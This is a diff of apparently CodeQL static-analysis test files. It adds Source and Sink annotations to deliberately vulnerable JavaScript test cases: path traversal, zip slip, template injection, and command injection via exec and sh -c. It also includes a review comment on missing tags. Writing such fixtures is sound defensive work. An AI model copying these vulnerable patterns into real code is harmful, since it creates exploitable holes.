.../ClientSideUrlRedirect/sanitizer.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst13.js | 14 +- .../CWE-601/ClientSideUrlRedirect/tst15.js | 6 +- .../CWE-601/ClientSideUrlRedirect/tst2.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst6.js | 2 +- .../CWE-601/ClientSideUrlRedirect/typed.ts | 8 +- .../ServerSideUrlRedirectGood2.js | 2 +- .../CWE-601/ServerSideUrlRedirect/express.js | 10 +- .../CWE-601/ServerSideUrlRedirect/koa.js | 2 +- .../CWE-601/ServerSideUrlRedirect/node.js | 6 +- .../ServerSideUrlRedirect/react-native.js | 2 +- .../Security/CWE-643/XpathInjectionBad.js | 2 +- .../test/query-tests/Security/CWE-643/tst.js | 2 +- .../test/query-tests/Security/CWE-643/tst2.js | 2 +- .../Security/CWE-730/RegExpInjection.js | 10 +- .../Security/CWE-730/server-crash.js | 24 +- .../test/query-tests/Security/CWE-730/tst.js | 2 +- .../CWE-754/UnsafeDynamicMethodAccess.js | 2 +- .../CWE-754/UnvalidatedDynamicMethodCall.js | 2 +- .../CWE-754/UnvalidatedDynamicMethodCall2.js | 2 +- .../UnvalidatedDynamicMethodCallGood4.js | 2 +- .../test/query-tests/Security/CWE-754/tst.js | 4 +- .../ResourceExhaustion_timeout.js | 2 +- .../ResourceExhaustion/resource-exhaustion.js | 2 +- .../query-tests/Security/CWE-776/closure.js | 2 +- .../query-tests/Security/CWE-776/domparser.js | 2 +- .../query-tests/Security/CWE-776/jquery.js | 2 +- .../test/query-tests/Security/CWE-807/tst.js | 2 +- .../Security/CWE-829/insecure-download.js | 2 +- .../Security/CWE-834/LoopBoundInjectionBad.js | 8 +- .../CWE-834/LoopBoundInjectionExitBad.js | 8 +- .../CWE-834/LoopBoundInjectionLodash.js | 2 +- .../test/query-tests/Security/CWE-843/tst.js | 8 +- .../Security/CWE-912/HttpToFileAccess.js | 2 +- .../test/query-tests/Security/CWE-912/tst.js | 2 +- .../PrototypePollutingAssignment/lib.js | 20 +- .../otherlib/src/otherlibimpl.js | 2 +- .../sublib/other.js | 2 +- .../sublib/sub.js | 2 +- .../PrototypePollutingAssignment/tst.js | 6 +- .../examples/PrototypePollutingFunction.js | 2 +- .../path-assignment.js | 8 
+- .../PrototypePollutingFunction/tests.js | 50 ++-- .../angularmerge.js | 2 +- .../src-vulnerable-lodash/tst.js | 4 +- .../webix/webix.html | 2 +- .../webix/webix.js | 2 +- .../Security/CWE-918/clientSide.js | 14 +- .../Security/CWE-918/serverSide.js | 64 ++--- 211 files changed, 797 insertions(+), 797 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js index f2ee8a6dd3c3..ece90af5215c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js @@ -1,6 +1,6 @@ let externalLib = require('external-lib'); -let untrusted = window.name; +let untrusted = window.name; // $ Source externalLib(untrusted); // $ Alert externalLib({x: untrusted}); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js index 2c915a920b16..573302c33cc5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js @@ -4,7 +4,7 @@ import { parse } from 'url'; import { join } from 'path'; var server = createServer(function(req, res) { - let path = parse(req.url, true).query.path; + let path = parse(req.url, true).query.path; // $ Source res.write(readFileSync(join("public", path))); // $ Alert - This could read any file on the file system }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js index cc36f38be2dc..ba57e930f03f 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js @@ -6,7 +6,7 @@ var fs = require('fs'), ; var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system @@ -33,7 +33,7 @@ var server = http.createServer(function(req, res) { path = sanitize(path); res.write(fs.readFileSync(path)); // OK - Path is sanitized - path = url.parse(req.url, true).query.path; + path = url.parse(req.url, true).query.path; // $ Source // OK - basename is safe res.write(fs.readFileSync(pathModule.basename(path))); res.write(fs.readFileSync(pathModule.dirname(path))); // $ Alert - taint is preserved @@ -70,7 +70,7 @@ var server = http.createServer(function(req, res) { })(); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(fs.realpathSync(path))); // $ Alert fs.realpath(path, @@ -106,13 +106,13 @@ var server = http.createServer(function(req, res) { }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source require('send')(req, path); // $ Alert }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert 
@@ -136,7 +136,7 @@ var server = http.createServer(function(req, res) { }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source // Removal of forward-slash or dots. res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); @@ -181,14 +181,14 @@ var server = http.createServer(function(req, res) { const cp = require("child_process"); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source cp.execSync("foobar", {cwd: path}); // $ Alert cp.execFileSync("foobar", ["args"], {cwd: path}); // $ Alert cp.execFileSync("foobar", {cwd: path}); // $ Alert }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source // Removal of forward-slash or dots. res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); @@ -197,7 +197,7 @@ var server = http.createServer(function(req, res) { }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // $ Alert - can be absolute diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js index a3e4028b0daa..568269866f5f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js 
@@ -5,7 +5,7 @@ const fs = require('fs'), const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { - let filePath = url.parse(req.url, true).query.path; + let filePath = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(ROOT + filePath, 'utf8')); // $ Alert - This function uses unsanitized input that can read any file on the file system. }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js index 2c251b8de379..4365de77a40f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js @@ -8,7 +8,7 @@ var fs = require('fs'), let app = express(); app.get('/basic', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source fs.readFileSync(path); // $ Alert fs.readFileSync('./' + path); // $ Alert @@ -18,7 +18,7 @@ app.get('/basic', (req, res) => { }); app.get('/normalize', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source fs.readFileSync(path); // $ Alert fs.readFileSync('./' + path); // $ Alert @@ -28,7 +28,7 @@ app.get('/normalize', (req, res) => { }); app.get('/normalize-notAbsolute', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (pathModule.isAbsolute(path)) return; @@ -51,7 +51,7 @@ app.get('/normalize-notAbsolute', (req, res) => { }); app.get('/normalize-noInitialDotDot', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (path.startsWith("..")) return; 
@@ -70,7 +70,7 @@ app.get('/normalize-noInitialDotDot', (req, res) => { app.get('/prepend-normalize', (req, res) => { // Coerce to relative prior to normalization - let path = pathModule.normalize('./' + req.query.path); + let path = pathModule.normalize('./' + req.query.path); // $ Source if (!path.startsWith("..")) fs.readFileSync(path); @@ -79,7 +79,7 @@ app.get('/prepend-normalize', (req, res) => { }); app.get('/absolute', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source if (!pathModule.isAbsolute(path)) return; @@ -91,7 +91,7 @@ app.get('/absolute', (req, res) => { }); app.get('/normalized-absolute', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (!pathModule.isAbsolute(path)) return; @@ -114,7 +114,7 @@ app.get('/combined-check', (req, res) => { }); app.get('/realpath', (req, res) => { - let path = fs.realpathSync(req.query.path); + let path = fs.realpathSync(req.query.path); // $ Source fs.readFileSync(path); // $ Alert fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert @@ -127,7 +127,7 @@ app.get('/realpath', (req, res) => { }); app.get('/coerce-relative', (req, res) => { - let path = pathModule.join('.', req.query.path); + let path = pathModule.join('.', req.query.path); // $ Source if (!path.startsWith('..')) fs.readFileSync(path); @@ -136,7 +136,7 @@ app.get('/coerce-relative', (req, res) => { }); app.get('/coerce-absolute', (req, res) => { - let path = pathModule.join('/home/user/www', req.query.path); + let path = pathModule.join('/home/user/www', req.query.path); // $ Source if (path.startsWith('/home/user/www')) fs.readFileSync(path); 
@@ -145,7 +145,7 @@ app.get('/coerce-absolute', (req, res) => { }); app.get('/concat-after-normalization', (req, res) => { - let path = 'foo/' + pathModule.normalize(req.query.path); + let path = 'foo/' + pathModule.normalize(req.query.path); // $ Source if (!path.startsWith('..')) fs.readFileSync(path); // $ Alert - prefixing foo/ invalidates check @@ -157,7 +157,7 @@ app.get('/concat-after-normalization', (req, res) => { }); app.get('/noDotDot', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (path.includes('..')) return; @@ -171,7 +171,7 @@ app.get('/noDotDot', (req, res) => { }); app.get('/join-regression', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source // Regression test for a specific corner case: // Some guard nodes sanitize both branches, but for a different set of flow labels. @@ -211,7 +211,7 @@ app.get('/join-regression', (req, res) => { }); app.get('/decode-after-normalization', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (!pathModule.isAbsolute(path) && !path.startsWith('..')) fs.readFileSync(path); @@ -223,7 +223,7 @@ app.get('/decode-after-normalization', (req, res) => { }); app.get('/replace', (req, res) => { - let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); + let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); // $ Source if (!pathModule.isAbsolute(path)) { fs.readFileSync(path); // $ Alert @@ -233,7 +233,7 @@ app.get('/replace', (req, res) => { }); app.get('/resolve-path', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source fs.readFileSync(path); // $ Alert 
@@ -251,7 +251,7 @@ app.get('/resolve-path', (req, res) => { }); app.get('/relative-startswith', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source fs.readFileSync(path); // $ Alert @@ -300,7 +300,7 @@ app.get('/relative-startswith', (req, res) => { var isPathInside = require("is-path-inside"), pathIsInside = require("path-is-inside"); app.get('/pseudo-normalizations', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source fs.readFileSync(path); // $ Alert if (isPathInside(path, SAFE)) { fs.readFileSync(path); @@ -336,7 +336,7 @@ app.get('/pseudo-normalizations', (req, res) => { }); app.get('/yet-another-prefix', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source fs.readFileSync(path); // $ Alert @@ -351,7 +351,7 @@ app.get('/yet-another-prefix', (req, res) => { var rootPath = process.cwd(); app.get('/yet-another-prefix2', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source fs.readFileSync(path); // $ Alert @@ -374,7 +374,7 @@ app.get('/yet-another-prefix2', (req, res) => { import slash from 'slash'; app.get('/slash-stuff', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source fs.readFileSync(path); // $ Alert @@ -382,7 +382,7 @@ app.get('/slash-stuff', (req, res) => { }); app.get('/dotdot-regexp', (req, res) => { - let path = pathModule.normalize(req.query.x); + let path = pathModule.normalize(req.query.x); // $ Source if (pathModule.isAbsolute(path)) return; fs.readFileSync(path); // $ Alert @@ -409,7 +409,7 @@ app.get('/join-spread', (req, res) => { }); app.get('/dotdot-matchAll-regexp', (req, res) => { - let path = pathModule.normalize(req.query.x); + let path = pathModule.normalize(req.query.x); // $ Source if (pathModule.isAbsolute(path)) return; fs.readFileSync(path); // $ Alert 
diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js index 8d2bfe11feb7..3c137faa8c94 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js @@ -6,7 +6,7 @@ var http = require("http"), originalFs = require("original-fs"); var server = http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert gracefulFs.readFileSync(path); // $ Alert @@ -35,7 +35,7 @@ function getFsModule(special) { var util = require("util"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source util.promisify(fs.readFileSync)(path); // $ Alert require("bluebird").promisify(fs.readFileSync)(path); // $ Alert @@ -46,7 +46,7 @@ http.createServer(function(req, res) { const asyncFS = require("./my-async-fs-module"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert asyncFS.readFileSync(path); // $ Alert @@ -65,7 +65,7 @@ http.createServer(function(req, res) { const mkdirp = require("mkdirp"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert mkdirp(path); // $ Alert @@ -78,7 +78,7 @@ function func(x) { const fsp = require("fs/promises"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source fsp.readFile(path); // $ Alert }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js index d3ee99d4974b..c198082b9932 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js @@ -3,7 +3,7 @@ const prettier = require("prettier"); const app = express(); app.get('/some/path', function (req, res) { - const { p } = req.params; + const { p } = req.params; // $ Source prettier.resolveConfig(p).then((options) => { // $ Alert const formatted = prettier.format("foo", options); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js index 37f8c348a0f6..8b0a64f523c9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js @@ -2,7 +2,7 @@ const puppeteer = require('puppeteer'); const parseTorrent = require('parse-torrent'); (async () => { - let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data"; + let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data"; // $ Source const browser = await puppeteer.launch(); const page = await browser.newPage(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js index fa19da302606..23c89ab5baec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js 
@@ -10,7 +10,7 @@ function getTree(req, res, options) { var workspaceId = req.params.workspaceId; var realfileRootPath = workspaceId; // getfileRoot(workspaceId); var filePath = workspaceId; // path.join(options.workspaceDir,realfileRootPath, req.params["0"]); - withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {}); + withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {}); // $ Source } function getfileRoot(workspaceId) { diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js index aaa6cfdc2407..ab5d3f008507 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js @@ -3,7 +3,7 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert @@ -36,7 +36,7 @@ server.listen(); var nodefs = require('node:fs'); var server2 = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source nodefs.readFileSync(path); // $ Alert }); @@ -45,6 +45,6 @@ server2.listen(); const chownr = require("chownr"); var server3 = http.createServer(function (req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source chownr(path, "someuid", "somegid", function (err) {}); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js index e18e3c7e8bb1..a21ae5a6f915 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js @@ -3,7 +3,7 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source doRead(Promise.resolve(path)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js index d705be16b317..6f281013a63c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js @@ -3,7 +3,7 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path.substring(i, j)); fs.readFileSync(path.substring(4)); // $ Alert fs.readFileSync(path.substring(0, i)); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js index 097bcc1fa117..d3c74ed8493d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js @@ -2,7 +2,7 @@ const parseTorrent = require('parse-torrent'), fs = require('fs'); function getTorrentData(dir, torrent){ - let name = parseTorrent(torrent).name, + let name = parseTorrent(torrent).name, // $ Source loc = dir + "/" + name + ".torrent.data"; return fs.readFileSync(loc); // $ Alert } 
diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts index 51549ea75658..a0d2a78b5d7b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts @@ -6,7 +6,7 @@ var fs = require('fs'), ; var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js index f16a816b73c4..e7ad3b8e264d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js @@ -5,7 +5,7 @@ fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { const fileName = entry.path; // $ Alert - entry.pipe(fs.createWriteStream(fileName)); + entry.pipe(fs.createWriteStream(fileName)); // $ Sink }); var Writer = require('fstream').Writer; @@ -13,14 +13,14 @@ fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { const fileName = entry.path; // $ Alert - entry.pipe(Writer({path: fileName})); + entry.pipe(Writer({path: fileName})); // $ Sink }); fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { const fileName = entry.path; // $ Alert - var file = fs.openSync(fileName, "w"); + var file = fs.openSync(fileName, "w"); // $ Sink }); const JSZip = require('jszip'); 
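Review bot: The ZipSlipBad.js hunks (and the ZipSlipBad2.js and ZipSlipBadUnzipper.js ones that follow) tag only the write calls with `// $ Sink`, while every other file in this commit also marks its source line with `// $ Source`; the `const fileName = entry.path; // $ Alert` lines are left without a source tag. If the ZipSlip test query reports sources the way the TaintedPath tests apparently do, those lines would need `const fileName = entry.path; // $ Alert Source`; if it does not, a one-line comment at the top of the file noting that only sinks are tagged here would keep the next migration from re-asking the question. The `fs.createReadStream(...)` chain that opens each `.on('entry', ...)` callback starts before the hunk.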
@@ -28,11 +28,11 @@ const zip = new JSZip(); const path = require('path'); function doZipSlip() { for (const name in zip.files) { // $ Alert - fs.createWriteStream(name); + fs.createWriteStream(name); // $ Sink } zip.forEach((name, file) => { // $ Alert - fs.createWriteStream(name); + fs.createWriteStream(name); // $ Sink }); const extractTo = path.resolve("/some/path/to/extract/to"); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js index 6960ac4eeae1..7c110ea95aa1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js @@ -3,6 +3,6 @@ var unzip = require('unzip'); fs.readFile('path/to/archive.zip', function (err, zipContents) { unzip.Parse(zipContents).on('entry', function (entry) { var fileName = 'output/path/' + entry.path; // $ Alert - fs.writeFileSync(fileName, entry.contents); + fs.writeFileSync(fileName, entry.contents); // $ Sink }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js index 2ba62e67480d..064bc58e25a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js @@ -5,5 +5,5 @@ fs.createReadStream('path/to/archive.zip') .pipe(unzipper.Parse()) .on('entry', function (entry) { var fileName = entry.path; // $ Alert - entry.pipe(fs.createWriteStream(fileName)); + entry.pipe(fs.createWriteStream(fileName)); // $ Sink }); diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst.js b/javascript/ql/test/query-tests/Security/CWE-073/tst.js index 8b6c30c46947..04422c253a0c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst.js 
@@ -4,8 +4,8 @@ app.set('view engine', 'hbs'); app.use(require('body-parser').json()); app.use(require('body-parser').urlencoded({ extended: false })); app.post('/path', function(req, res) { - var bodyParameter = req.body.bodyParameter; - var queryParameter = req.query.queryParameter; + var bodyParameter = req.body.bodyParameter; // $ Source + var queryParameter = req.query.queryParameter; // $ Source res.render('template', bodyParameter); // $ Alert res.render('template', queryParameter); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js index 8f8b075010bf..5e0168f0707c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js @@ -3,7 +3,7 @@ var app = require('express')(); app.engine( '.hbs', handlebars({ defaultLayout: 'main', extname: '.hbs' }) ); app.set('view engine', '.hbs') app.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); @@ -23,7 +23,7 @@ app3.post('/path', require('body-parser').json(), function(req, res) { var app4 = require('express')(); app4.set('view engine', 'ejs'); app4.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); @@ -31,7 +31,7 @@ var app5 = require('express')(); app5.engine("foobar", require("consolidate").whiskers); app5.set('view engine', 'foobar'); app5.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); 
@@ -39,7 +39,7 @@ var app6 = require('express')(); app6.register(".html", require("consolidate").whiskers); app6.set('view engine', 'html'); app6.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); @@ -48,7 +48,7 @@ var router = express.Router(); var app7 = express(); app7.set('view engine', 'ejs'); router.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); app7.use("/router", router); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js index 3f50d6d5df66..ebc765667a85 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js @@ -5,7 +5,7 @@ const { exec } = require('child_process'); // function to echo title function echo_title() { // get the title from the event pull request - const title = github.context.payload.pull_request.title; + const title = github.context.payload.pull_request.title; // $ Source exec(`echo ${title}`, (err, stdout, stderr) => { // $ Alert if (err) { return; @@ -15,7 +15,7 @@ function echo_title() { // function which passes the issue title into an exec function exec_head_ref() { - const head_ref = github.context.payload.pull_request.head.ref; + const head_ref = github.context.payload.pull_request.head.ref; // $ Source aexec.exec(`echo ${head_ref}`).then((res) => { // $ Alert console.log(res); }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js index ed1c9041a8ea..d11d97fc1c35 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js @@ -3,7 +3,7 @@ var cp = require("child_process"), url = require('url'); var server = http.createServer(function(req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Sink Source cp.exec("foo"); cp.execSync("foo"); @@ -36,25 +36,25 @@ var server = http.createServer(function(req, res) { sh = 'cmd.exe', flag = '/c'; else sh = '/bin/sh', flag = '-c'; - cp.spawn(sh, [ flag, cmd ]); // $ Alert + cp.spawn(sh, [ flag, cmd ]); // $ Alert Sink let args = []; args[0] = "-c"; - args[1] = cmd; + args[1] = cmd; // $ Sink cp.execFile("/bin/bash", args); // $ Alert args = []; args[0] = "-c"; - args[1] = cmd; + args[1] = cmd; // $ Sink run("sh", args); args = []; args[0] = `-` + "c"; - args[1] = cmd; + args[1] = cmd; // $ Sink cp.execFile(`/bin` + "/bash", args); // $ Alert - cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert - cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert + cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert Sink + cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert Sink let myArgs = []; myArgs.push(`-` + "c"); 
